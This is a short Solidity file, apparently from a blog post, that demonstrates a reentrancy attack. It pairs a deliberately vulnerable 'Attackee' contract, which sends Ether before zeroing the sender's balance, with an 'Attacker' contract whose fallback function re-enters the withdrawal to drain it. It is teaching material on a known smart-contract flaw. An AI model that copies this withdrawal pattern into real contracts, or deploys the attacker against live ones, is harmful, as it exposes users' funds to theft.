Attacker.performAttack can drain Attackee in a reentrancy attack that utilizes the Attacker's fallback function

ReentrancyAttackExample.sol

// SPDX-License-Identifier: GPL-3.0

pragma solidity >=0.7.0 <0.9.0;

contract Attackee {
    mapping(address => uint) public attackeeBalances; 
    
    function depositIntoAttackee() external payable {
        attackeeBalances[msg.sender] += msg.value;
    }
    
    function withdrawFromAttackee() public {
        uint senderBalance = attackeeBalances[msg.sender];
        require(senderBalance > 0);
        
        (bool success, ) = msg.sender.call{ value: senderBalance }("");
        require(success, "withdrawFromAttackee failed to send");
        
        attackeeBalances[msg.sender] = 0;
    }
    
    function getBalanceFromAttackee() public view returns (uint) {
        return address(this).balance;
    }
}

contract Attacker {
    Attackee public contractToAttack;
    
    constructor(address _contractToAttackAddress) {
        contractToAttack = Attackee(_contractToAttackAddress);
    }
    
    //this is called when Attackee sends Ether to this contract (Attacker)
    fallback() external payable {
        if(address(contractToAttack).balance >= 1 ether) {
            contractToAttack.withdrawFromAttackee();
        }
    }
    
    function performAttack() external payable {
        require(msg.value >= 1 ether);
        contractToAttack.depositIntoAttackee{value: 1 ether}();
        contractToAttack.withdrawFromAttackee();
    }
    
    function getBalanceFromAttacker() public view returns (uint) {
        return address(this).balance;
    }
}

Used as an example in This Blog Post